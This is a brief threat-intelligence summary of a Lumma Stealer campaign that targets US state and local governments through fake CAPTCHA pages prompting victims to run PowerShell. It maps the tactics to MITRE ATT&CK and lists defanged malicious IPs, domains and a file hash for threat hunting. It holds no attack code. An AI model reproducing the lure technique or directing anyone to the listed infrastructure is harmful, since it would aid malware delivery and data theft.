The Lumma Stealer malware has been observed targeting U.S. State, Local, Tribal, and Territorial (SLTT) government organizations through fake CAPTCHA verification pages that trick users into executing malicious PowerShell scripts. This malware, available as a Malware-as-a-Service, specializes in stealing sensitive data. Cyber threat actors utilize a variety of deceptive tactics and defense evasion techniques to deliver the malware and avoid detection. Affected: U.S. State, Local, Tribal, and Territorial government organizations
Keypoints :
- Lumma Stealer malware targets SLTT government organizations in the U.S.
- Misinformation campaigns use fake CAPTCHA verification prompts.
- Malware is delivered through obfuscated JavaScript and PowerShell scripts.
- Lumma Stealer is offered as a Malware-as-a-Service by threat actors.
- It steals personally identifiable information (PII), including credentials and banking data.
- Multiple techniques for defense evasion, including DLL sideloading and PowerShell, are utilized.
- Indicators of compromise (IOCs) have been listed for threat hunting purposes.
MITRE Techniques :
- T1583.001 Acquire Infrastructure: Domains – Cyber threat actors acquire malicious domains for deploying their malware.
- T1583.008 Acquire Infrastructure: Malvertising – Usage of malvertisements as an initial infection vector.
- T1189 Drive-by Compromise – Victims are redirected to malicious websites via compromised ads.
- T1059.001 Command and Scripting Interpreter: PowerShell – Malicious PowerShell scripts are executed to deliver the malware payload.
- T1218.005 System Binary Proxy Execution: Mshta – The Mshta utility executes malicious scripts.
Indicator of Compromise :
- [IP Address] 104[.]21[.]37[.]171
- [IP Address] 13[.]107[.]246[.]38
- [Domain] absolutepicks[.]shop
- [SHA256 Hash] C0F74200267A768EB6F8A392A708C9CEDE9062E0E9D4391040AE94B495450D0D
- [Domain] botcheck-encrypted-system[.]b-cdn[.]net
Full Story: https://www.cisecurity.org/insights/blog/active-lumma-stealer-campaign-impacting-us-sltts